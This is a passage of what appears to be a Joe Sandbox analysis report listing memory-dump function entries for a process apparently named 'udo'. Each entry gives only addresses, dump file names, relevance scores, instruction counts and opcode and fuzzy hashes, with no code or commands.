                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 663e76e10fdb048be68e24965c345ba7a96d2c195bf553768e2e44be33e40869
                                                            • Instruction ID: ee33b55d052463221979f81f97d9f86a41d6a77c2db0dc7e4103e80343919bb1
                                                            • Opcode Fuzzy Hash: 663e76e10fdb048be68e24965c345ba7a96d2c195bf553768e2e44be33e40869
                                                            • Instruction Fuzzy Hash: 5E2182313041A58FEB14CE6EE854A6BFBF9EB85200B044466E591D7241DF36DD42C763
                                                            Function 0172C3D0 Relevance: .1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8e96871c1c88ed328fff3a8635c257f9577c51ab96a78197a1f5e08e340a1df
                                                            • Instruction ID: 8322d079072e8ea182df19595a902f0ea4656541fad596b8a5a288892a08ad7c
                                                            • Opcode Fuzzy Hash: d8e96871c1c88ed328fff3a8635c257f9577c51ab96a78197a1f5e08e340a1df
                                                            • Instruction Fuzzy Hash: 65214672948510CFC312BF3DE85923D7FB1EF61714F058AAAD0C483286EA34491AD7E6
                                                            Function 0172CA76 Relevance: .1, Instructions: 80COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a687cfc17b70831f7afab3ee75e72451c2461869d619b12bc5879d603aca2f4
                                                            • Instruction ID: 0e9a8f3c9072b8fd40f269b1725b927b2660205bb6a755f7141410b805f9a7be
                                                            • Opcode Fuzzy Hash: 8a687cfc17b70831f7afab3ee75e72451c2461869d619b12bc5879d603aca2f4
                                                            • Instruction Fuzzy Hash: 482106719186508FC317ABBCE46962DBFB4EF46610F4585DBD088D7152CF384D08E7A2
                                                            Function 01726780 Relevance: .1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fcd93ba02b53de8ac3d33c83cc97323cbfdb12b0b78a34faf2b075e4a474e42
                                                            • Instruction ID: 681228b2fab8465c74a54df9b1749197f6045c8868a388432e6523e1df6d294f
                                                            • Opcode Fuzzy Hash: 4fcd93ba02b53de8ac3d33c83cc97323cbfdb12b0b78a34faf2b075e4a474e42
                                                            • Instruction Fuzzy Hash: 1921D476B015219FD7199B68D858A2ABB92FFC8711B15846AEE06CB380DF34DC029790
                                                            Function 0153D554 Relevance: .1, Instructions: 75COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3822444147.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_153d000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cc96f39fbbe98d08267073dd863107a9297326c6ad5eb754f3813ddb896ada66
                                                            • Instruction ID: b2fa83c3bf731e14fb6e32c06abac1974c2fead1bb998d91d026704e5613f512
                                                            • Opcode Fuzzy Hash: cc96f39fbbe98d08267073dd863107a9297326c6ad5eb754f3813ddb896ada66
                                                            • Instruction Fuzzy Hash: A2212572504244EFDB15DF94D9C0B2ABBB5FBC8328F60C569E8090F296C336D456CAA2
                                                            Function 07D890D4 Relevance: .1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1ca6dc3363859e0c0c8fbc53566501c4537c7f4f5f9a69b35353e2bc26c5d29
                                                            • Instruction ID: ef0480b539ab48e91e3a2906422831ebae5372afe850ab0a78a41326a33b5b87
                                                            • Opcode Fuzzy Hash: c1ca6dc3363859e0c0c8fbc53566501c4537c7f4f5f9a69b35353e2bc26c5d29
                                                            • Instruction Fuzzy Hash: 58215BA164E3D28FD70387789C796A97F719F43211B0A81E7D495DB2E3C62D9C09C362
                                                            Function 07D8C67B Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 245f1682a28e52602f14397a33552ef0f3bba2757e7e6931e925d739aafa43c2
                                                            • Instruction ID: 6d2f2102a614d3c0a0b67c6b1e84480da41f187be2a341e93b94b24be217584e
                                                            • Opcode Fuzzy Hash: 245f1682a28e52602f14397a33552ef0f3bba2757e7e6931e925d739aafa43c2
                                                            • Instruction Fuzzy Hash: A921AC31B24214CBD344BBBCED4963EBFA6EF85610B4549AAE088D3350DF384918D7B2
                                                            Function 07D8C57B Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15ec75b637447f1827e1efffd896b0720510c3945f03125a160d870c0a907aaf
                                                            • Instruction ID: d31233e899ed41b8ba2c464d166f585f1a47015ed4596d8eab36512550b016f2
                                                            • Opcode Fuzzy Hash: 15ec75b637447f1827e1efffd896b0720510c3945f03125a160d870c0a907aaf
                                                            • Instruction Fuzzy Hash: 74118C71A24408CBC344BBBCF59EA6DBFA1EF49B00F4088A8E448D3360EE384948D775
                                                            Function 07D8C580 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a15a36f7335d414c501f5c7dc42be005d1acd4f52036e44f4926d459879810a
                                                            • Instruction ID: 4da92ee0ea2229106d68a1a4ad9fe5547d91ee7dd18cb3abc2f56419ae6febba
                                                            • Opcode Fuzzy Hash: 3a15a36f7335d414c501f5c7dc42be005d1acd4f52036e44f4926d459879810a
                                                            • Instruction Fuzzy Hash: 22114C31A24508CBC744BBBDF49EA2DBFA5EF49750F4088A8E448D3260DE385958D7B6
                                                            Function 0153D54F Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3822444147.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_153d000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                            • Instruction ID: a732932779b1df5f7f97e6f14df3bc58f50650a97846111cc26053e762a0f8b4
                                                            • Opcode Fuzzy Hash: 335ff2cd27920e120e44ddd98b5f99d48130ef09aa4f624435d54826826d70db
                                                            • Instruction Fuzzy Hash: CE11AC76504280CFDB16CF54D9C4B1ABF72FB88324F2486A9D8490F657C33AD45ADBA2
                                                            Function 0153D7CD Relevance: .0, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3822444147.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_153d000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 194d242b53c54791ef7bd5dbe5c1024999ef1a87eb987c37618a1caa734668c2
                                                            • Instruction ID: df1952eec42c46a92223badd9936b8b5e25c4035c6c9a59096ce898de79decf7
                                                            • Opcode Fuzzy Hash: 194d242b53c54791ef7bd5dbe5c1024999ef1a87eb987c37618a1caa734668c2
                                                            • Instruction Fuzzy Hash: C601F731504344ABE7214A95C880767FBF8FF81264F44C429ED0C0F183C378A440CAB5
                                                            Function 01728778 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e0814a40186d3ea8946c4352573cb801c052a7d750ecf7e24728d7bf4f9e3c2
                                                            • Instruction ID: f287a0c034e7502bc0b2202ed0bc8c3c36492529acf9cd91dcfe593ad549a14c
                                                            • Opcode Fuzzy Hash: 0e0814a40186d3ea8946c4352573cb801c052a7d750ecf7e24728d7bf4f9e3c2
                                                            • Instruction Fuzzy Hash: 04F096353106244F97159ABE9444B2BFADEEFC8E613154079EA06C7362DF62DC138791
                                                            Function 0153D7CC Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3822444147.000000000153D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0153D000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_153d000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6a28a6cb89752c3dbf7ec51bede6a43ec7e8acdfcb895836e1da648c5dd33a1f
                                                            • Instruction ID: 157dfae1a3b27e38802f25f2677493d9f87db992a5c8480157f60a21eca446d8
                                                            • Opcode Fuzzy Hash: 6a28a6cb89752c3dbf7ec51bede6a43ec7e8acdfcb895836e1da648c5dd33a1f
                                                            • Instruction Fuzzy Hash: 6AF0C271404340AFE7208A4AC884B67FFE8FB81634F18C55AED4C5F287C378A840CAB1
                                                            Function 07D80F73 Relevance: .0, Instructions: 27COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6cb02808a10aa5b2dab87145d177c4d49d81748b067589f7d1df9d077f2756ab
                                                            • Instruction ID: e3a099e0cdfa0e590a8b0be8bf4c06ecc038525172325ab6b9ba0de7f6be4112
                                                            • Opcode Fuzzy Hash: 6cb02808a10aa5b2dab87145d177c4d49d81748b067589f7d1df9d077f2756ab
                                                            • Instruction Fuzzy Hash: 26E0DF253102186BEB0866366845A7E7B9BA7C0A30B44C42DE4028B240CD62DC0526E4
                                                            Function 07D80F2B Relevance: .0, Instructions: 25COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96be62b603087a9513abb450a8420c85beeab228ea9168ff53756dd6b6b8eb52
                                                            • Instruction ID: 4c5c359e15d80dfca1359797eaa9ee10412bcb1000e7902d04267a091446ba5e
                                                            • Opcode Fuzzy Hash: 96be62b603087a9513abb450a8420c85beeab228ea9168ff53756dd6b6b8eb52
                                                            • Instruction Fuzzy Hash: 3BE022B1A1030BFBCB40DFA8E8485D9BFA8EB81130F1081E9E4455B220DA325E02EB40
                                                            Function 07D889AB Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ab7fe1a441235c3001259d0aff945229509726e192c63132c7fd2e87df183189
                                                            • Instruction ID: ba0cbf2eb02b5f892a708645794110a9d0449085187e193e8d7c4c887f2ac2c6
                                                            • Opcode Fuzzy Hash: ab7fe1a441235c3001259d0aff945229509726e192c63132c7fd2e87df183189
                                                            • Instruction Fuzzy Hash: 35E0ECB53212068FF3527F75E00EB657F68EF05656340C0A9F84582155CF35ED10EE62
                                                            Function 07D8897D Relevance: .0, Instructions: 18COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7aea464e51855b861e4fdbda3acc81638b6593bddbc7e2e2a485209ae4653de
                                                            • Instruction ID: 763af77a1c31ec346e672e7ec33e994ee86281599f60020be33470b06be3104e
                                                            • Opcode Fuzzy Hash: a7aea464e51855b861e4fdbda3acc81638b6593bddbc7e2e2a485209ae4653de
                                                            • Instruction Fuzzy Hash: BDE0C7B1222202CFF7022F30E40FA2A3F38EF4020A344C0AEF84681601DF399800EB22
                                                            Function 07D80F30 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3844826033.0000000007D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D80000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_7d80000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8198ee05087155965bc8e8b6dd6b44a7581bf32fcad92914350cd7bbea7ef37b
                                                            • Instruction ID: 8a73d2354823ba1730a69670bbaa59e23a77b496918ca82c7f404434461daffa
                                                            • Opcode Fuzzy Hash: 8198ee05087155965bc8e8b6dd6b44a7581bf32fcad92914350cd7bbea7ef37b
                                                            • Instruction Fuzzy Hash: BAD01270A1120EFFDB40DFA4F98559DB7F9EB85120F5085A9E40697200DA716E009B51
                                                            Function 01726BC9 Relevance: .0, Instructions: 16COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: adf10191d78068877ff4dfcdb0eb086dc22d73e3ce5ab1c518c012ed801a868c
                                                            • Instruction ID: e178e0b1e5b6c3606b3f42b9f4910b67de768a5e7eb75a095baadc92d73da573
                                                            • Opcode Fuzzy Hash: adf10191d78068877ff4dfcdb0eb086dc22d73e3ce5ab1c518c012ed801a868c
                                                            • Instruction Fuzzy Hash: 00E0C2719083094FD606E7A4EC4AA5437B2FBC1210B0445D1D5040F2A2DB7C9844DB89
                                                            Function 01726BD8 Relevance: .0, Instructions: 12COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.3823951878.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_1720000_udo.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 69bb669d963cb9df4c669175cbf39b5bf4617447f9d18b84886975448652903b
                                                            • Instruction ID: 035d724d0db30e5f5e2f4c549e6f01d0fee9440f2199769e1a8e93ac6a50c3f9
                                                            • Opcode Fuzzy Hash: 69bb669d963cb9df4c669175cbf39b5bf4617447f9d18b84886975448652903b
                                                            • Instruction Fuzzy Hash: 9AC0807151431D4BD545F775F84A95533ABF7C0524B508550E5050B105DF7C9C08DBD5